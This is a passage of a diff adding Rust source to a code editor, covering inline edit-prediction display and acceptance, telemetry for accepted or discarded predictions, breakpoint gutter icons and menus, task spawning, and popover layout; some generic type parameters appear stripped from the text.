cx, + ); + + match &active_inline_completion.completion { + InlineCompletion::Move { target, .. 
} => { + let target = *target; + self.change_selections(Some(Autoscroll::newest()), window, cx, |selections| { + selections.select_anchor_ranges([target..target]); + }); + } + InlineCompletion::Edit { edits, .. } => { + // Find an insertion that starts at the cursor position. + let snapshot = self.buffer.read(cx).snapshot(cx); + let cursor_offset = self.selections.newest::(cx).head(); + let insertion = edits.iter().find_map(|(range, text)| { + let range = range.to_offset(&snapshot); + if range.is_empty() && range.start == cursor_offset { + Some(text) + } else { + None + } + }); + + if let Some(text) = insertion { + let mut partial_completion = text + .chars() + .by_ref() + .take_while(|c| c.is_alphabetic()) + .collect::(); + if partial_completion.is_empty() { + partial_completion = text + .chars() + .by_ref() + .take_while(|c| c.is_whitespace() || !c.is_alphabetic()) + .collect::(); + } + + cx.emit(EditorEvent::InputHandled { + utf16_range_to_replace: None, + text: partial_completion.clone().into(), + }); + + self.insert_with_autoindent_mode(&partial_completion, None, window, cx); + + self.refresh_inline_completion(true, true, window, cx); + cx.notify(); + } else { + self.accept_edit_prediction(&Default::default(), window, cx); + } + } + } + } + + fn discard_inline_completion( + &mut self, + should_report_inline_completion_event: bool, + cx: &mut Context, + ) -> bool { + if should_report_inline_completion_event { + let completion_id = self + .active_inline_completion + .as_ref() + .and_then(|active_completion| active_completion.completion_id.clone()); + + self.report_inline_completion_event(completion_id, false, cx); + } + + if let Some(provider) = self.edit_prediction_provider() { + provider.discard(cx); + } + + self.take_active_inline_completion(cx) + } + + fn report_inline_completion_event(&self, id: Option, accepted: bool, cx: &App) { + let Some(provider) = self.edit_prediction_provider() else { + return; + }; + + let Some((_, buffer, _)) = self + .buffer + 
.read(cx) + .excerpt_containing(self.selections.newest_anchor().head(), cx) + else { + return; + }; + + let extension = buffer + .read(cx) + .file() + .and_then(|file| Some(file.path().extension()?.to_string_lossy().to_string())); + + let event_type = match accepted { + true => "Edit Prediction Accepted", + false => "Edit Prediction Discarded", + }; + telemetry::event!( + event_type, + provider = provider.name(), + prediction_id = id, + suggestion_accepted = accepted, + file_extension = extension, + ); + } + + pub fn has_active_inline_completion(&self) -> bool { + self.active_inline_completion.is_some() + } + + fn take_active_inline_completion(&mut self, cx: &mut Context) -> bool { + let Some(active_inline_completion) = self.active_inline_completion.take() else { + return false; + }; + + self.splice_inlays(&active_inline_completion.inlay_ids, Default::default(), cx); + self.clear_highlights::(cx); + self.stale_inline_completion_in_menu = Some(active_inline_completion); + true + } + + /// Returns true when we're displaying the edit prediction popover below the cursor + /// like we are not previewing and the LSP autocomplete menu is visible + /// or we are in `when_holding_modifier` mode. 
+ pub fn edit_prediction_visible_in_cursor_popover(&self, has_completion: bool) -> bool { + if self.edit_prediction_preview_is_active() + || !self.show_edit_predictions_in_menu() + || !self.edit_predictions_enabled() + { + return false; + } + + if self.has_visible_completions_menu() { + return true; + } + + has_completion && self.edit_prediction_requires_modifier() + } + + fn handle_modifiers_changed( + &mut self, + modifiers: Modifiers, + position_map: &PositionMap, + window: &mut Window, + cx: &mut Context, + ) { + if self.show_edit_predictions_in_menu() { + self.update_edit_prediction_preview(&modifiers, window, cx); + } + + self.update_selection_mode(&modifiers, position_map, window, cx); + + let mouse_position = window.mouse_position(); + if !position_map.text_hitbox.is_hovered(window) { + return; + } + + self.update_hovered_link( + position_map.point_for_position(mouse_position), + &position_map.snapshot, + modifiers, + window, + cx, + ) + } + + fn update_selection_mode( + &mut self, + modifiers: &Modifiers, + position_map: &PositionMap, + window: &mut Window, + cx: &mut Context, + ) { + if modifiers != &COLUMNAR_SELECTION_MODIFIERS || self.selections.pending.is_none() { + return; + } + + let mouse_position = window.mouse_position(); + let point_for_position = position_map.point_for_position(mouse_position); + let position = point_for_position.previous_valid; + + self.select( + SelectPhase::BeginColumnar { + position, + reset: false, + goal_column: point_for_position.exact_unclipped.column(), + }, + window, + cx, + ); + } + + fn update_edit_prediction_preview( + &mut self, + modifiers: &Modifiers, + window: &mut Window, + cx: &mut Context, + ) { + let accept_keybind = self.accept_edit_prediction_keybind(window, cx); + let Some(accept_keystroke) = accept_keybind.keystroke() else { + return; + }; + + if &accept_keystroke.modifiers == modifiers && accept_keystroke.modifiers.modified() { + if matches!( + self.edit_prediction_preview, + 
EditPredictionPreview::Inactive { .. } + ) { + self.edit_prediction_preview = EditPredictionPreview::Active { + previous_scroll_position: None, + since: Instant::now(), + }; + + self.update_visible_inline_completion(window, cx); + cx.notify(); + } + } else if let EditPredictionPreview::Active { + previous_scroll_position, + since, + } = self.edit_prediction_preview + { + if let (Some(previous_scroll_position), Some(position_map)) = + (previous_scroll_position, self.last_position_map.as_ref()) + { + self.set_scroll_position( + previous_scroll_position + .scroll_position(&position_map.snapshot.display_snapshot), + window, + cx, + ); + } + + self.edit_prediction_preview = EditPredictionPreview::Inactive { + released_too_fast: since.elapsed() < Duration::from_millis(200), + }; + self.clear_row_highlights::(); + self.update_visible_inline_completion(window, cx); + cx.notify(); + } + } + + fn update_visible_inline_completion( + &mut self, + _window: &mut Window, + cx: &mut Context, + ) -> Option<()> { + let selection = self.selections.newest_anchor(); + let cursor = selection.head(); + let multibuffer = self.buffer.read(cx).snapshot(cx); + let offset_selection = selection.map(|endpoint| endpoint.to_offset(&multibuffer)); + let excerpt_id = cursor.excerpt_id; + + let show_in_menu = self.show_edit_predictions_in_menu(); + let completions_menu_has_precedence = !show_in_menu + && (self.context_menu.borrow().is_some() + || (!self.completion_tasks.is_empty() && !self.has_active_inline_completion())); + + if completions_menu_has_precedence + || !offset_selection.is_empty() + || self + .active_inline_completion + .as_ref() + .map_or(false, |completion| { + let invalidation_range = completion.invalidation_range.to_offset(&multibuffer); + let invalidation_range = invalidation_range.start..=invalidation_range.end; + !invalidation_range.contains(&offset_selection.head()) + }) + { + self.discard_inline_completion(false, cx); + return None; + } + + 
self.take_active_inline_completion(cx); + let Some(provider) = self.edit_prediction_provider() else { + self.edit_prediction_settings = EditPredictionSettings::Disabled; + return None; + }; + + let (buffer, cursor_buffer_position) = + self.buffer.read(cx).text_anchor_for_position(cursor, cx)?; + + self.edit_prediction_settings = + self.edit_prediction_settings_at_position(&buffer, cursor_buffer_position, cx); + + self.edit_prediction_indent_conflict = multibuffer.is_line_whitespace_upto(cursor); + + if self.edit_prediction_indent_conflict { + let cursor_point = cursor.to_point(&multibuffer); + + let indents = multibuffer.suggested_indents(cursor_point.row..cursor_point.row + 1, cx); + + if let Some((_, indent)) = indents.iter().next() { + if indent.len == cursor_point.column { + self.edit_prediction_indent_conflict = false; + } + } + } + + let inline_completion = provider.suggest(&buffer, cursor_buffer_position, cx)?; + let edits = inline_completion + .edits + .into_iter() + .flat_map(|(range, new_text)| { + let start = multibuffer.anchor_in_excerpt(excerpt_id, range.start)?; + let end = multibuffer.anchor_in_excerpt(excerpt_id, range.end)?; + Some((start..end, new_text)) + }) + .collect::>(); + if edits.is_empty() { + return None; + } + + let first_edit_start = edits.first().unwrap().0.start; + let first_edit_start_point = first_edit_start.to_point(&multibuffer); + let edit_start_row = first_edit_start_point.row.saturating_sub(2); + + let last_edit_end = edits.last().unwrap().0.end; + let last_edit_end_point = last_edit_end.to_point(&multibuffer); + let edit_end_row = cmp::min(multibuffer.max_point().row, last_edit_end_point.row + 2); + + let cursor_row = cursor.to_point(&multibuffer).row; + + let snapshot = multibuffer.buffer_for_excerpt(excerpt_id).cloned()?; + + let mut inlay_ids = Vec::new(); + let invalidation_row_range; + let move_invalidation_row_range = if cursor_row < edit_start_row { + Some(cursor_row..edit_end_row) + } else if cursor_row > edit_end_row 
{ + Some(edit_start_row..cursor_row) + } else { + None + }; + let is_move = + move_invalidation_row_range.is_some() || self.inline_completions_hidden_for_vim_mode; + let completion = if is_move { + invalidation_row_range = + move_invalidation_row_range.unwrap_or(edit_start_row..edit_end_row); + let target = first_edit_start; + InlineCompletion::Move { target, snapshot } + } else { + let show_completions_in_buffer = !self.edit_prediction_visible_in_cursor_popover(true) + && !self.inline_completions_hidden_for_vim_mode; + + if show_completions_in_buffer { + if edits + .iter() + .all(|(range, _)| range.to_offset(&multibuffer).is_empty()) + { + let mut inlays = Vec::new(); + for (range, new_text) in &edits { + let inlay = Inlay::inline_completion( + post_inc(&mut self.next_inlay_id), + range.start, + new_text.as_str(), + ); + inlay_ids.push(inlay.id); + inlays.push(inlay); + } + + self.splice_inlays(&[], inlays, cx); + } else { + let background_color = cx.theme().status().deleted_background; + self.highlight_text::( + edits.iter().map(|(range, _)| range.clone()).collect(), + HighlightStyle { + background_color: Some(background_color), + ..Default::default() + }, + cx, + ); + } + } + + invalidation_row_range = edit_start_row..edit_end_row; + + let display_mode = if all_edits_insertions_or_deletions(&edits, &multibuffer) { + if provider.show_tab_accept_marker() { + EditDisplayMode::TabAccept + } else { + EditDisplayMode::Inline + } + } else { + EditDisplayMode::DiffPopover + }; + + InlineCompletion::Edit { + edits, + edit_preview: inline_completion.edit_preview, + display_mode, + snapshot, + } + }; + + let invalidation_range = multibuffer + .anchor_before(Point::new(invalidation_row_range.start, 0)) + ..multibuffer.anchor_after(Point::new( + invalidation_row_range.end, + multibuffer.line_len(MultiBufferRow(invalidation_row_range.end)), + )); + + self.stale_inline_completion_in_menu = None; + self.active_inline_completion = Some(InlineCompletionState { + inlay_ids, + 
completion, + completion_id: inline_completion.id, + invalidation_range, + }); + + cx.notify(); + + Some(()) + } + + pub fn edit_prediction_provider(&self) -> Option> { + Some(self.edit_prediction_provider.as_ref()?.provider.clone()) + } + + fn render_code_actions_indicator( + &self, + _style: &EditorStyle, + row: DisplayRow, + is_active: bool, + breakpoint: Option<&(Anchor, Breakpoint)>, + cx: &mut Context, + ) -> Option { + let color = Color::Muted; + let position = breakpoint.as_ref().map(|(anchor, _)| *anchor); + let show_tooltip = !self.context_menu_visible(); + + if self.available_code_actions.is_some() { + Some( + IconButton::new("code_actions_indicator", ui::IconName::Bolt) + .shape(ui::IconButtonShape::Square) + .icon_size(IconSize::XSmall) + .icon_color(color) + .toggle_state(is_active) + .when(show_tooltip, |this| { + this.tooltip({ + let focus_handle = self.focus_handle.clone(); + move |window, cx| { + Tooltip::for_action_in( + "Toggle Code Actions", + &ToggleCodeActions { + deployed_from_indicator: None, + quick_launch: false, + }, + &focus_handle, + window, + cx, + ) + } + }) + }) + .on_click(cx.listener(move |editor, e: &ClickEvent, window, cx| { + let quick_launch = e.down.button == MouseButton::Left; + window.focus(&editor.focus_handle(cx)); + editor.toggle_code_actions( + &ToggleCodeActions { + deployed_from_indicator: Some(row), + quick_launch, + }, + window, + cx, + ); + })) + .on_right_click(cx.listener(move |editor, event: &ClickEvent, window, cx| { + editor.set_breakpoint_context_menu( + row, + position, + event.down.position, + window, + cx, + ); + })), + ) + } else { + None + } + } + + fn clear_tasks(&mut self) { + self.tasks.clear() + } + + fn insert_tasks(&mut self, key: (BufferId, BufferRow), value: RunnableTasks) { + if self.tasks.insert(key, value).is_some() { + // This case should hopefully be rare, but just in case... 
+ log::error!( + "multiple different run targets found on a single line, only the last target will be rendered" + ) + } + } + + /// Get all display points of breakpoints that will be rendered within editor + /// + /// This function is used to handle overlaps between breakpoints and Code action/runner symbol. + /// It's also used to set the color of line numbers with breakpoints to the breakpoint color. + /// TODO debugger: Use this function to color toggle symbols that house nested breakpoints + fn active_breakpoints( + &self, + range: Range, + window: &mut Window, + cx: &mut Context, + ) -> HashMap { + let mut breakpoint_display_points = HashMap::default(); + + let Some(breakpoint_store) = self.breakpoint_store.clone() else { + return breakpoint_display_points; + }; + + let snapshot = self.snapshot(window, cx); + + let multi_buffer_snapshot = &snapshot.display_snapshot.buffer_snapshot; + let Some(project) = self.project.as_ref() else { + return breakpoint_display_points; + }; + + let range = snapshot.display_point_to_point(DisplayPoint::new(range.start, 0), Bias::Left) + ..snapshot.display_point_to_point(DisplayPoint::new(range.end, 0), Bias::Right); + + for (buffer_snapshot, range, excerpt_id) in + multi_buffer_snapshot.range_to_buffer_ranges(range) + { + let Some(buffer) = project.read_with(cx, |this, cx| { + this.buffer_for_id(buffer_snapshot.remote_id(), cx) + }) else { + continue; + }; + let breakpoints = breakpoint_store.read(cx).breakpoints( + &buffer, + Some( + buffer_snapshot.anchor_before(range.start) + ..buffer_snapshot.anchor_after(range.end), + ), + buffer_snapshot, + cx, + ); + for (anchor, breakpoint) in breakpoints { + let multi_buffer_anchor = + Anchor::in_buffer(excerpt_id, buffer_snapshot.remote_id(), *anchor); + let position = multi_buffer_anchor + .to_point(&multi_buffer_snapshot) + .to_display_point(&snapshot); + + breakpoint_display_points + .insert(position.row(), (multi_buffer_anchor, breakpoint.clone())); + } + } + + 
breakpoint_display_points + } + + fn breakpoint_context_menu( + &self, + anchor: Anchor, + window: &mut Window, + cx: &mut Context, + ) -> Entity { + let weak_editor = cx.weak_entity(); + let focus_handle = self.focus_handle(cx); + + let row = self + .buffer + .read(cx) + .snapshot(cx) + .summary_for_anchor::(&anchor) + .row; + + let breakpoint = self + .breakpoint_at_row(row, window, cx) + .map(|(anchor, bp)| (anchor, Arc::from(bp))); + + let log_breakpoint_msg = if breakpoint.as_ref().is_some_and(|bp| bp.1.message.is_some()) { + "Edit Log Breakpoint" + } else { + "Set Log Breakpoint" + }; + + let condition_breakpoint_msg = if breakpoint + .as_ref() + .is_some_and(|bp| bp.1.condition.is_some()) + { + "Edit Condition Breakpoint" + } else { + "Set Condition Breakpoint" + }; + + let hit_condition_breakpoint_msg = if breakpoint + .as_ref() + .is_some_and(|bp| bp.1.hit_condition.is_some()) + { + "Edit Hit Condition Breakpoint" + } else { + "Set Hit Condition Breakpoint" + }; + + let set_breakpoint_msg = if breakpoint.as_ref().is_some() { + "Unset Breakpoint" + } else { + "Set Breakpoint" + }; + + let run_to_cursor = command_palette_hooks::CommandPaletteFilter::try_global(cx) + .map_or(false, |filter| !filter.is_hidden(&DebuggerRunToCursor)); + + let toggle_state_msg = breakpoint.as_ref().map_or(None, |bp| match bp.1.state { + BreakpointState::Enabled => Some("Disable"), + BreakpointState::Disabled => Some("Enable"), + }); + + let (anchor, breakpoint) = + breakpoint.unwrap_or_else(|| (anchor, Arc::new(Breakpoint::new_standard()))); + + ui::ContextMenu::build(window, cx, |menu, _, _cx| { + menu.on_blur_subscription(Subscription::new(|| {})) + .context(focus_handle) + .when(run_to_cursor, |this| { + let weak_editor = weak_editor.clone(); + this.entry("Run to cursor", None, move |window, cx| { + weak_editor + .update(cx, |editor, cx| { + editor.change_selections(None, window, cx, |s| { + s.select_ranges([Point::new(row, 0)..Point::new(row, 0)]) + }); + }) + .ok(); + + 
window.dispatch_action(Box::new(DebuggerRunToCursor), cx); + }) + .separator() + }) + .when_some(toggle_state_msg, |this, msg| { + this.entry(msg, None, { + let weak_editor = weak_editor.clone(); + let breakpoint = breakpoint.clone(); + move |_window, cx| { + weak_editor + .update(cx, |this, cx| { + this.edit_breakpoint_at_anchor( + anchor, + breakpoint.as_ref().clone(), + BreakpointEditAction::InvertState, + cx, + ); + }) + .log_err(); + } + }) + }) + .entry(set_breakpoint_msg, None, { + let weak_editor = weak_editor.clone(); + let breakpoint = breakpoint.clone(); + move |_window, cx| { + weak_editor + .update(cx, |this, cx| { + this.edit_breakpoint_at_anchor( + anchor, + breakpoint.as_ref().clone(), + BreakpointEditAction::Toggle, + cx, + ); + }) + .log_err(); + } + }) + .entry(log_breakpoint_msg, None, { + let breakpoint = breakpoint.clone(); + let weak_editor = weak_editor.clone(); + move |window, cx| { + weak_editor + .update(cx, |this, cx| { + this.add_edit_breakpoint_block( + anchor, + breakpoint.as_ref(), + BreakpointPromptEditAction::Log, + window, + cx, + ); + }) + .log_err(); + } + }) + .entry(condition_breakpoint_msg, None, { + let breakpoint = breakpoint.clone(); + let weak_editor = weak_editor.clone(); + move |window, cx| { + weak_editor + .update(cx, |this, cx| { + this.add_edit_breakpoint_block( + anchor, + breakpoint.as_ref(), + BreakpointPromptEditAction::Condition, + window, + cx, + ); + }) + .log_err(); + } + }) + .entry(hit_condition_breakpoint_msg, None, move |window, cx| { + weak_editor + .update(cx, |this, cx| { + this.add_edit_breakpoint_block( + anchor, + breakpoint.as_ref(), + BreakpointPromptEditAction::HitCondition, + window, + cx, + ); + }) + .log_err(); + }) + }) + } + + fn render_breakpoint( + &self, + position: Anchor, + row: DisplayRow, + breakpoint: &Breakpoint, + cx: &mut Context, + ) -> IconButton { + // Is it a breakpoint that shows up when hovering over gutter? 
+ let (is_phantom, collides_with_existing) = self.gutter_breakpoint_indicator.0.map_or( + (false, false), + |PhantomBreakpointIndicator { + is_active, + display_row, + collides_with_existing_breakpoint, + }| { + ( + is_active && display_row == row, + collides_with_existing_breakpoint, + ) + }, + ); + + let (color, icon) = { + let icon = match (&breakpoint.message.is_some(), breakpoint.is_disabled()) { + (false, false) => ui::IconName::DebugBreakpoint, + (true, false) => ui::IconName::DebugLogBreakpoint, + (false, true) => ui::IconName::DebugDisabledBreakpoint, + (true, true) => ui::IconName::DebugDisabledLogBreakpoint, + }; + + let color = if is_phantom { + Color::Hint + } else { + Color::Debugger + }; + + (color, icon) + }; + + let breakpoint = Arc::from(breakpoint.clone()); + + let alt_as_text = gpui::Keystroke { + modifiers: Modifiers::secondary_key(), + ..Default::default() + }; + let primary_action_text = if breakpoint.is_disabled() { + "enable" + } else if is_phantom && !collides_with_existing { + "set" + } else { + "unset" + }; + let mut primary_text = format!("Click to {primary_action_text}"); + if collides_with_existing && !breakpoint.is_disabled() { + use std::fmt::Write; + write!(primary_text, ", {alt_as_text}-click to disable").ok(); + } + let primary_text = SharedString::from(primary_text); + let focus_handle = self.focus_handle.clone(); + IconButton::new(("breakpoint_indicator", row.0 as usize), icon) + .icon_size(IconSize::XSmall) + .size(ui::ButtonSize::None) + .icon_color(color) + .style(ButtonStyle::Transparent) + .on_click(cx.listener({ + let breakpoint = breakpoint.clone(); + + move |editor, event: &ClickEvent, window, cx| { + let edit_action = if event.modifiers().platform || breakpoint.is_disabled() { + BreakpointEditAction::InvertState + } else { + BreakpointEditAction::Toggle + }; + + window.focus(&editor.focus_handle(cx)); + editor.edit_breakpoint_at_anchor( + position, + breakpoint.as_ref().clone(), + edit_action, + cx, + ); + } + })) + 
.on_right_click(cx.listener(move |editor, event: &ClickEvent, window, cx| { + editor.set_breakpoint_context_menu( + row, + Some(position), + event.down.position, + window, + cx, + ); + })) + .tooltip(move |window, cx| { + Tooltip::with_meta_in( + primary_text.clone(), + None, + "Right-click for more options", + &focus_handle, + window, + cx, + ) + }) + } + + fn build_tasks_context( + project: &Entity, + buffer: &Entity, + buffer_row: u32, + tasks: &Arc, + cx: &mut Context, + ) -> Task> { + let position = Point::new(buffer_row, tasks.column); + let range_start = buffer.read(cx).anchor_at(position, Bias::Right); + let location = Location { + buffer: buffer.clone(), + range: range_start..range_start, + }; + // Fill in the environmental variables from the tree-sitter captures + let mut captured_task_variables = TaskVariables::default(); + for (capture_name, value) in tasks.extra_variables.clone() { + captured_task_variables.insert( + task::VariableName::Custom(capture_name.into()), + value.clone(), + ); + } + project.update(cx, |project, cx| { + project.task_store().update(cx, |task_store, cx| { + task_store.task_context_for_location(captured_task_variables, location, cx) + }) + }) + } + + pub fn spawn_nearest_task( + &mut self, + action: &SpawnNearestTask, + window: &mut Window, + cx: &mut Context, + ) { + let Some((workspace, _)) = self.workspace.clone() else { + return; + }; + let Some(project) = self.project.clone() else { + return; + }; + + // Try to find a closest, enclosing node using tree-sitter that has a + // task + let Some((buffer, buffer_row, tasks)) = self + .find_enclosing_node_task(cx) + // Or find the task that's closest in row-distance. 
+ .or_else(|| self.find_closest_task(cx)) + else { + return; + }; + + let reveal_strategy = action.reveal; + let task_context = Self::build_tasks_context(&project, &buffer, buffer_row, &tasks, cx); + cx.spawn_in(window, async move |_, cx| { + let context = task_context.await?; + let (task_source_kind, mut resolved_task) = tasks.resolve(&context).next()?; + + let resolved = &mut resolved_task.resolved; + resolved.reveal = reveal_strategy; + + workspace + .update_in(cx, |workspace, window, cx| { + workspace.schedule_resolved_task( + task_source_kind, + resolved_task, + false, + window, + cx, + ); + }) + .ok() + }) + .detach(); + } + + fn find_closest_task( + &mut self, + cx: &mut Context, + ) -> Option<(Entity, u32, Arc)> { + let cursor_row = self.selections.newest_adjusted(cx).head().row; + + let ((buffer_id, row), tasks) = self + .tasks + .iter() + .min_by_key(|((_, row), _)| cursor_row.abs_diff(*row))?; + + let buffer = self.buffer.read(cx).buffer(*buffer_id)?; + let tasks = Arc::new(tasks.to_owned()); + Some((buffer, *row, tasks)) + } + + fn find_enclosing_node_task( + &mut self, + cx: &mut Context, + ) -> Option<(Entity, u32, Arc)> { + let snapshot = self.buffer.read(cx).snapshot(cx); + let offset = self.selections.newest::(cx).head(); + let excerpt = snapshot.excerpt_containing(offset..offset)?; + let buffer_id = excerpt.buffer().remote_id(); + + let layer = excerpt.buffer().syntax_layer_at(offset)?; + let mut cursor = layer.node().walk(); + + while cursor.goto_first_child_for_byte(offset).is_some() { + if cursor.node().end_byte() == offset { + cursor.goto_next_sibling(); + } + } + + // Ascend to the smallest ancestor that contains the range and has a task. 
+ loop { + let node = cursor.node(); + let node_range = node.byte_range(); + let symbol_start_row = excerpt.buffer().offset_to_point(node.start_byte()).row; + + // Check if this node contains our offset + if node_range.start <= offset && node_range.end >= offset { + // If it contains offset, check for task + if let Some(tasks) = self.tasks.get(&(buffer_id, symbol_start_row)) { + let buffer = self.buffer.read(cx).buffer(buffer_id)?; + return Some((buffer, symbol_start_row, Arc::new(tasks.to_owned()))); + } + } + + if !cursor.goto_parent() { + break; + } + } + None + } + + fn render_run_indicator( + &self, + _style: &EditorStyle, + is_active: bool, + row: DisplayRow, + breakpoint: Option<(Anchor, Breakpoint)>, + cx: &mut Context, + ) -> IconButton { + let color = Color::Muted; + let position = breakpoint.as_ref().map(|(anchor, _)| *anchor); + + IconButton::new(("run_indicator", row.0 as usize), ui::IconName::Play) + .shape(ui::IconButtonShape::Square) + .icon_size(IconSize::XSmall) + .icon_color(color) + .toggle_state(is_active) + .on_click(cx.listener(move |editor, e: &ClickEvent, window, cx| { + let quick_launch = e.down.button == MouseButton::Left; + window.focus(&editor.focus_handle(cx)); + editor.toggle_code_actions( + &ToggleCodeActions { + deployed_from_indicator: Some(row), + quick_launch, + }, + window, + cx, + ); + })) + .on_right_click(cx.listener(move |editor, event: &ClickEvent, window, cx| { + editor.set_breakpoint_context_menu(row, position, event.down.position, window, cx); + })) + } + + pub fn context_menu_visible(&self) -> bool { + !self.edit_prediction_preview_is_active() + && self + .context_menu + .borrow() + .as_ref() + .map_or(false, |menu| menu.visible()) + } + + fn context_menu_origin(&self) -> Option { + self.context_menu + .borrow() + .as_ref() + .map(|menu| menu.origin()) + } + + pub fn set_context_menu_options(&mut self, options: ContextMenuOptions) { + self.context_menu_options = Some(options); + } + + const 
EDIT_PREDICTION_POPOVER_PADDING_X: Pixels = Pixels(24.); + const EDIT_PREDICTION_POPOVER_PADDING_Y: Pixels = Pixels(2.); + + fn render_edit_prediction_popover( + &mut self, + text_bounds: &Bounds, + content_origin: gpui::Point, + editor_snapshot: &EditorSnapshot, + visible_row_range: Range, + scroll_top: f32, + scroll_bottom: f32, + line_layouts: &[LineWithInvisibles], + line_height: Pixels, + scroll_pixel_position: gpui::Point, + newest_selection_head: Option, + editor_width: Pixels, + style: &EditorStyle, + window: &mut Window, + cx: &mut App, + ) -> Option<(AnyElement, gpui::Point)> { + let active_inline_completion = self.active_inline_completion.as_ref()?; + + if self.edit_prediction_visible_in_cursor_popover(true) { + return None; + } + + match &active_inline_completion.completion { + InlineCompletion::Move { target, .. } => { + let target_display_point = target.to_display_point(editor_snapshot); + + if self.edit_prediction_requires_modifier() { + if !self.edit_prediction_preview_is_active() { + return None; + } + + self.render_edit_prediction_modifier_jump_popover( + text_bounds, + content_origin, + visible_row_range, + line_layouts, + line_height, + scroll_pixel_position, + newest_selection_head, + target_display_point, + window, + cx, + ) + } else { + self.render_edit_prediction_eager_jump_popover( + text_bounds, + content_origin, + editor_snapshot, + visible_row_range, + scroll_top, + scroll_bottom, + line_height, + scroll_pixel_position, + target_display_point, + editor_width, + window, + cx, + ) + } + } + InlineCompletion::Edit { + display_mode: EditDisplayMode::Inline, + .. + } => None, + InlineCompletion::Edit { + display_mode: EditDisplayMode::TabAccept, + edits, + .. 
+ } => { + let range = &edits.first()?.0; + let target_display_point = range.end.to_display_point(editor_snapshot); + + self.render_edit_prediction_end_of_line_popover( + "Accept", + editor_snapshot, + visible_row_range, + target_display_point, + line_height, + scroll_pixel_position, + content_origin, + editor_width, + window, + cx, + ) + } + InlineCompletion::Edit { + edits, + edit_preview, + display_mode: EditDisplayMode::DiffPopover, + snapshot, + } => self.render_edit_prediction_diff_popover( + text_bounds, + content_origin, + editor_snapshot, + visible_row_range, + line_layouts, + line_height, + scroll_pixel_position, + newest_selection_head, + editor_width, + style, + edits, + edit_preview, + snapshot, + window, + cx, + ), + } + } + + fn render_edit_prediction_modifier_jump_popover( + &mut self, + text_bounds: &Bounds, + content_origin: gpui::Point, + visible_row_range: Range, + line_layouts: &[LineWithInvisibles], + line_height: Pixels, + scroll_pixel_position: gpui::Point, + newest_selection_head: Option, + target_display_point: DisplayPoint, + window: &mut Window, + cx: &mut App, + ) -> Option<(AnyElement, gpui::Point)> { + let scrolled_content_origin = + content_origin - gpui::Point::new(scroll_pixel_position.x, Pixels(0.0)); + + const SCROLL_PADDING_Y: Pixels = px(12.); + + if target_display_point.row() < visible_row_range.start { + return self.render_edit_prediction_scroll_popover( + |_| SCROLL_PADDING_Y, + IconName::ArrowUp, + visible_row_range, + line_layouts, + newest_selection_head, + scrolled_content_origin, + window, + cx, + ); + } else if target_display_point.row() >= visible_row_range.end { + return self.render_edit_prediction_scroll_popover( + |size| text_bounds.size.height - size.height - SCROLL_PADDING_Y, + IconName::ArrowDown, + visible_row_range, + line_layouts, + newest_selection_head, + scrolled_content_origin, + window, + cx, + ); + } + + const POLE_WIDTH: Pixels = px(2.); + + let line_layout = + 
line_layouts.get(target_display_point.row().minus(visible_row_range.start) as usize)?; + let target_column = target_display_point.column() as usize; + + let target_x = line_layout.x_for_index(target_column); + let target_y = + (target_display_point.row().as_f32() * line_height) - scroll_pixel_position.y; + + let flag_on_right = target_x < text_bounds.size.width / 2.; + + let mut border_color = Self::edit_prediction_callout_popover_border_color(cx); + border_color.l += 0.001; + + let mut element = v_flex() + .items_end() + .when(flag_on_right, |el| el.items_start()) + .child(if flag_on_right { + self.render_edit_prediction_line_popover("Jump", None, window, cx)? + .rounded_bl(px(0.)) + .rounded_tl(px(0.)) + .border_l_2() + .border_color(border_color) + } else { + self.render_edit_prediction_line_popover("Jump", None, window, cx)? + .rounded_br(px(0.)) + .rounded_tr(px(0.)) + .border_r_2() + .border_color(border_color) + }) + .child(div().w(POLE_WIDTH).bg(border_color).h(line_height)) + .into_any(); + + let size = element.layout_as_root(AvailableSpace::min_size(), window, cx); + + let mut origin = scrolled_content_origin + point(target_x, target_y) + - point( + if flag_on_right { + POLE_WIDTH + } else { + size.width - POLE_WIDTH + }, + size.height - line_height, + ); + + origin.x = origin.x.max(content_origin.x); + + element.prepaint_at(origin, window, cx); + + Some((element, origin)) + } + + fn render_edit_prediction_scroll_popover( + &mut self, + to_y: impl Fn(Size) -> Pixels, + scroll_icon: IconName, + visible_row_range: Range, + line_layouts: &[LineWithInvisibles], + newest_selection_head: Option, + scrolled_content_origin: gpui::Point, + window: &mut Window, + cx: &mut App, + ) -> Option<(AnyElement, gpui::Point)> { + let mut element = self + .render_edit_prediction_line_popover("Scroll", Some(scroll_icon), window, cx)? 
+ .into_any(); + + let size = element.layout_as_root(AvailableSpace::min_size(), window, cx); + + let cursor = newest_selection_head?; + let cursor_row_layout = + line_layouts.get(cursor.row().minus(visible_row_range.start) as usize)?; + let cursor_column = cursor.column() as usize; + + let cursor_character_x = cursor_row_layout.x_for_index(cursor_column); + + let origin = scrolled_content_origin + point(cursor_character_x, to_y(size)); + + element.prepaint_at(origin, window, cx); + Some((element, origin)) + } + + fn render_edit_prediction_eager_jump_popover( + &mut self, + text_bounds: &Bounds, + content_origin: gpui::Point, + editor_snapshot: &EditorSnapshot, + visible_row_range: Range, + scroll_top: f32, + scroll_bottom: f32, + line_height: Pixels, + scroll_pixel_position: gpui::Point, + target_display_point: DisplayPoint, + editor_width: Pixels, + window: &mut Window, + cx: &mut App, + ) -> Option<(AnyElement, gpui::Point)> { + if target_display_point.row().as_f32() < scroll_top { + let mut element = self + .render_edit_prediction_line_popover( + "Jump to Edit", + Some(IconName::ArrowUp), + window, + cx, + )? + .into_any(); + + let size = element.layout_as_root(AvailableSpace::min_size(), window, cx); + let offset = point( + (text_bounds.size.width - size.width) / 2., + Self::EDIT_PREDICTION_POPOVER_PADDING_Y, + ); + + let origin = text_bounds.origin + offset; + element.prepaint_at(origin, window, cx); + Some((element, origin)) + } else if (target_display_point.row().as_f32() + 1.) > scroll_bottom { + let mut element = self + .render_edit_prediction_line_popover( + "Jump to Edit", + Some(IconName::ArrowDown), + window, + cx, + )? 
